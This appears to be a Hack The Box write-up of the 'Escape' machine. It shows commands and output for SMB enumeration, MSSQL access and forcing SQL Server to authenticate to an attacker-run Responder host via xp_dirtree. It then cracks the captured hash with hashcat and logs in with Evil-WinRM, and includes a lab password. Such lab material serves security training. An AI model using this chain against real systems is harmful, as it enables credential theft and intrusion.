HTB Escape Walkthrough

A very particular Windows machine, on which I got stuck, stubbornly looking for an exploit, when the way in was in fact a simple clue left in plain sight that allowed a very trivial privesc. More challenging, but almost standard, the second privesc, which then led me to the desired root flag.

Let's start with the nmap scan.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:03 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-13 05:03:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-11T20:10:28
|_Not valid after:  2053-03-11T20:10:28
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m17s, deviation: 0s, median: 7h59m17s
| smb2-time: 
|   date: 2023-03-13T05:03:45
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds

As usual on a Windows domain controller there are plenty of open ports; not satisfied with that, let's also take a look at the UDP ports.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox]
└─$ sudo nmap -sU 10.10.11.202
[sudo] password for in7rud3r: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:13 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 290.76 seconds

Not much there, thank goodness! OK, let's analyze one port at a time.

53 - DNS, 88 - kerberos, 135, 593 - RPC, 139, 445 - SMB, 464

Nothing to report on this set, unless I've missed something.

139, 445 - SMB

The enum4linux tool doesn't enumerate anything in particular, so let's try a manual approach.
I'm able to connect with the rpcclient tool (rpcclient -U "" -N 10.10.11.202), but investigating this would take too much time; I'll mark it as something to come back to if I can't find anything else, and move on.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient -L //10.10.11.202 
Password for [WORKGROUP\in7rud3r]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Among the classic Windows administrative shares, smbclient shows a "Public" share that could be interesting; let's take a look.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient --no-pass \\\\10.10.11.202\\Public
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1428481 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)

Let's take a look at the PDF.

[images: pages of SQL Server Procedures.pdf]

Well, a good domain to insert into my /etc/hosts (sequel.htb); the document also hands over the PublicUser SQL login that I use in the steps below. Go ahead.

389 (636, 3268, 3269) - LDAP

As for LDAP, I tried to navigate the structure using phpLDAPAdmin as usual, but without success.

1433 - SQL Server

For the uninitiated, port 1433 is the default port of SQL Server. There will be a lot of work here; let's get to it.

The Metasploit Framework is full of modules for SQL Server... and I think I've tried a lot of them.

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > use admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Running MS SQL Server Enumeration...
[*] 10.10.11.202:1433 - Version:
[*]     Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
[*]             Sep 24 2019 13:48:23 
[*]             Copyright (C) 2019 Microsoft Corporation
[*]             Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.10.11.202:1433 - Configuration Parameters:
[*] 10.10.11.202:1433 -         C2 Audit Mode is Not Enabled
[...]
[*] 10.10.11.202:1433 -         sp_getbindtoken
[*] 10.10.11.202:1433 -         sp_replincrementlsn
[*] 10.10.11.202:1433 - Instances found on this server:
[*] 10.10.11.202:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.10.11.202:1433 -         xp_regread might be disabled in this system
[*] Auxiliary module execution completed

msf6 auxiliary(admin/mssql/mssql_enum) > use admin/mssql/mssql_enum_domain_accounts
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > options

Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              10000            yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[+] 10.10.11.202:1433 - Connected.
[*] 10.10.11.202:1433 - SQL Server Name: DC
[...]
[+] 10.10.11.202:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.10.11.202:1433 - Query results have been saved to: /home/in7rud3r/.msf4/loot/20230313173523_default_10.10.11.202_mssql.domain.acc_775956.txt
[*] Auxiliary module execution completed

msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > use admin/mssql/mssql_enum_sql_logins
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > options

Module options (auxiliary/admin/mssql/mssql_enum_sql_logins):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              300              yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[...]
[*] 10.10.11.202:1433 -  - PublicUser
[*] 10.10.11.202:1433 -  - sa
[*] 10.10.11.202:1433 -  - sequel\Administrator
[*] Auxiliary module execution completed

I omitted some of the modules I ran, and some sections of the output, so as not to take up too much reading time.

Now let's connect to the SQL Server instance and investigate the contents of the databases.

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@sequel.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> select @@version

Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

SQL> SELECT name, database_id, create_date FROM sys.databases; 
name     database_id   create_date
------   -----------   -------------------
master             1   2003-04-08 09:13:36
tempdb             2   2023-03-13 09:35:39
model              3   2003-04-08 09:13:36
msdb               4   2019-09-24 14:21:42

SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME         TABLE_TYPE
-------------   ------------   ----------------   -------------
master          dbo            spt_fallback_db    b'BASE TABLE'
master          dbo            spt_fallback_dev   b'BASE TABLE'
master          dbo            spt_fallback_usg   b'BASE TABLE'
master          dbo            spt_values         b'VIEW'
master          dbo            spt_monitor        b'BASE TABLE'

SQL> use tempdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: tempdb
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'tempdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE
-------------   ------------   ----------   ----------

SQL> use model
[-] ERROR(DC\SQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL> use msdb
[*] ENVCHANGE(DATABASE): Old Value: tempdb, New Value: msdb
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'msdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME                                   TABLE_TYPE
-------------   ------------   ------------------------------------------   -------------
msdb            dbo            syspolicy_policy_category_subscriptions      b'VIEW'
msdb            dbo            syspolicy_system_health_state                b'VIEW'
msdb            dbo            syspolicy_policy_execution_history           b'VIEW'
msdb            dbo            syspolicy_policy_execution_history_details   b'VIEW'
msdb            dbo            syspolicy_configuration                      b'VIEW'
msdb            dbo            syspolicy_conditions                         b'VIEW'
msdb            dbo            syspolicy_policy_categories                  b'VIEW'
msdb            dbo            sysdac_instances                             b'VIEW'
msdb            dbo            syspolicy_object_sets                        b'VIEW'
msdb            dbo            dm_hadr_automatic_seeding_history            b'BASE TABLE'
msdb            dbo            syspolicy_policies                           b'VIEW'
msdb            dbo            backupmediaset                               b'BASE TABLE'
msdb            dbo            backupmediafamily                            b'BASE TABLE'
msdb            dbo            backupset                                    b'BASE TABLE'
msdb            dbo            autoadmin_backup_configuration_summary       b'VIEW'
msdb            dbo            backupfile                                   b'BASE TABLE'
msdb            dbo            syspolicy_target_sets                        b'VIEW'
msdb            dbo            restorehistory                               b'BASE TABLE'
msdb            dbo            restorefile                                  b'BASE TABLE'
msdb            dbo            syspolicy_target_set_levels                  b'VIEW'
msdb            dbo            restorefilegroup                             b'BASE TABLE'
msdb            dbo            logmarkhistory                               b'BASE TABLE'
msdb            dbo            suspect_pages                                b'BASE TABLE'

SQL>

Besides the SQL Server version, which may come in handy to identify a specific exploit, the instance doesn't seem to contain many schemas or tables, and PublicUser is a low-privileged login: the interesting system queries I tried mostly came back with "permission denied". I therefore fall back on the de facto reference guide for this service.

1433 - Pentesting MSSQL - Microsoft SQL Server - HackTricks

Inside the guide, we find an interesting attack, which is worth trying.

The concept behind this attack is to make the SQL Server service account authenticate to a fake SMB server under our control: a low-privileged login can call a stored procedure such as xp_dirtree with a UNC path, the service follows it, and our listener captures the NetNTLMv2 challenge/response of the unsuspecting service account. Note that the nmap scan above shows SMB signing is required on the DC, so relaying that authentication back is not an option; the response has to be cracked offline instead.

So, activate our responder...

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo responder -I tun0
[sudo] password for in7rud3r: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.111]
    Responder IPv6             [dead:beef:2::106d]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-IM2J35A52MX]
    Responder Domain Name      [GFB0.LOCAL]
    Responder DCE-RPC Port     [47501]

[+] Listening for events...                                                                                                                                                                              

...let's take advantage of one of the Metasploit Framework exploits...

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ msfconsole       
                                                  
 ______________________________________
/ it looks like you're trying to run a \                                                                                                                                                                 
\ module                               /                                                                                                                                                                 
 --------------------------------------                                                                                                                                                                  
 \                                                                                                                                                                                                       
  \                                                                                                                                                                                                      
     __                                                                                                                                                                                                  
    /  \                                                                                                                                                                                                 
    |  |                                                                                                                                                                                                 
    @  @                                                                                                                                                                                                 
    |  |                                                                                                                                                                                                 
    || |/                                                                                                                                                                                                
    || ||                                                                                                                                                                                                
    |\_/|                                                                                                                                                                                                
    \___/                                                                                                                                                                                                
                                                                                                                                                                                                         

       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use help <command> to learn more 
about any command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > options

Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   SMBPROXY             0.0.0.0          yes       IP of SMB proxy or sniffer.
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set smbproxy 10.10.14.111
smbproxy => 10.10.14.111
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > exploit

[*] 10.10.11.202:1433     - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.11.202:1433     - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.111 via xp_dirtree...
[+] 10.10.11.202:1433     - Successfully executed xp_dirtree on 10.10.11.202
[+] 10.10.11.202:1433     - Go check your SMB relay or capture module for goodies!
[*] sequel.htb:1433       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

...and wait for the attacked service to fall into the trap.

[...]
[+] Listening for events...                                                                                                                                                                              

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:5162e1326254c61a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

We now have a NetNTLMv2 hash that we can feed to hashcat once we have identified the corresponding hash mode (5600).
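The captured line is in hashcat's mode-5600 layout (user::domain:server challenge:NTProofStr:blob). For an incident responder who finds such a line in a Responder log or a packet capture, the blob is worth decoding: its TargetInfo names the host the service believed it was authenticating to, and its timestamp dates the event. The following is an added example, not code from the walkthrough or from Responder/hashcat, that parses such a line; the sample blob is constructed with the Responder machine name and domain from the session variables above, the server challenge from the capture, and a placeholder NTProofStr.

```python
"""Decode a captured NetNTLMv2 line in hashcat mode-5600 layout.

Constructed example for the capture above; not code from the walkthrough,
Responder or hashcat. The blob is the NTLMv2_CLIENT_CHALLENGE ("temp")
structure from MS-NLMP: the part of the response after the 16-byte NTProofStr.
"""
import struct
from datetime import datetime, timedelta, timezone

# MS-NLMP AV_PAIR identifiers (AvId) that make up the TargetInfo list.
AV_IDS = {
    0x0000: "MsvAvEOL", 0x0001: "MsvAvNbComputerName",
    0x0002: "MsvAvNbDomainName", 0x0003: "MsvAvDnsComputerName",
    0x0004: "MsvAvDnsDomainName", 0x0005: "MsvAvDnsTreeName",
    0x0006: "MsvAvFlags", 0x0007: "MsvAvTimestamp",
    0x0008: "MsvAvSingleHost", 0x0009: "MsvAvTargetName",
    0x000A: "MsvAvChannelBindings",
}
STRING_AV_IDS = {0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0009}  # UTF-16LE values
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> timezone-aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, done in integers to keep full precision."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_av_pairs(data: bytes, offset: int):
    """Walk the AV_PAIR list at offset; return (decoded pairs, offset after MsvAvEOL)."""
    pairs = {}
    while True:
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        value = data[offset:offset + av_len]
        offset += av_len
        if av_id == 0x0000:  # MsvAvEOL terminates the list
            return pairs, offset
        name = AV_IDS.get(av_id, f"MsvAv0x{av_id:04x}")
        if av_id in STRING_AV_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 0x0007:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value.hex()


def parse_netntlmv2_line(line: str) -> dict:
    """Split 'USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB' and decode the blob."""
    user, _, domain, challenge, ntproof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 blob: RespType/HiRespType must be 0x01 0x01")
    # Layout: RespType(1) HiRespType(1) Z(6) TimeStamp(8) ClientChallenge(8) Z(4) AvPairs Z(4)
    timestamp, = struct.unpack_from("<Q", blob, 8)
    target_info, end = parse_av_pairs(blob, 28)
    return {
        "user": user,
        "domain": domain,
        "server_challenge": challenge.lower(),
        "ntproofstr": ntproof.lower(),
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": blob[16:24].hex(),
        "target_info": target_info,
        "trailing_zeros_ok": blob[end:end + 4] == b"\x00" * 4,
    }


def build_sample_line() -> str:
    """Construct a sample line whose TargetInfo carries the Responder host's names
    from the session variables above (constructed, not the real captured blob)."""
    def av(av_id: int, value: bytes) -> bytes:
        return struct.pack("<HH", av_id, len(value)) + value

    ft = datetime_to_filetime(datetime(2023, 3, 19, 5, 20, 0, tzinfo=timezone.utc))
    target_info = (
        av(0x0002, "GFB0".encode("utf-16-le"))
        + av(0x0001, "WIN-IM2J35A52MX".encode("utf-16-le"))
        + av(0x0004, "GFB0.LOCAL".encode("utf-16-le"))
        + av(0x0003, "WIN-IM2J35A52MX.GFB0.LOCAL".encode("utf-16-le"))
        + av(0x0007, struct.pack("<Q", ft))
        + av(0x0000, b"")
    )
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", ft)
            + bytes.fromhex("0123456789abcdef") + b"\x00" * 4 + target_info + b"\x00" * 4)
    # Server challenge is the one from the capture above; NTProofStr is a placeholder.
    return "sql_svc::sequel:5162e1326254c61a:" + "00" * 16 + ":" + blob.hex()


if __name__ == "__main__":
    for key, value in parse_netntlmv2_line(build_sample_line()).items():
        print(f"{key:18} {value}")
```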

example_hashes [hashcat wiki]

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ cat NTLMv2-SSP.hash 
sql_svc::sequel:5162e1326254c61a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

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ hashcat -m 5600 NTLMv2-SSP.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

/sys/class/hwmon/hwmon4/temp1_input: No such file or directory

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1410/2885 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba2e60b95a70d405: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:REGGIE1234ronnie
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba...000000
Time.Started.....: Sun Mar 19 05:29:14 2023 (30 secs)
Time.Estimated...: Sun Mar 19 05:29:44 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   395.6 kH/s (1.09ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700288/14344385 (74.60%)
Rejected.........: 0/10700288 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REESY15987
Hardware.Mon.#1..: Util: 91%

Started: Sun Mar 19 05:27:49 2023
Stopped: Sun Mar 19 05:29:46 2023

And after some waiting and patience, the password comes out. What better tool to use than Evil-WinRM?

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
*Evil-WinRM* PS C:\Users\sql_svc\Documents> dir /users


    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:58 AM                Administrator
d-r---        7/20/2021  12:23 PM                Public
d-----         2/1/2023   6:37 PM                Ryan.Cooper
d-----         2/7/2023   8:10 AM                sql_svc

Obviously, this user can't do much, so a winPEAS session is needed. We upload the scanner to the box through the upload feature that Evil-WinRM provides...

[...]
*Evil-WinRM* PS C:\Users\sql_svc> upload ../upld/winPEAS.bat /users/sql_svc/winPEAS.bat
Info: Uploading ../upld/winPEAS.bat to /users/sql_svc/winPEAS.bat

                                                             
Data: 47928 bytes of 47928 bytes copied

Info: Upload successful!

...and start it, saving the result so as not to lose it.

./winPEAS.bat | tee wpeas.output

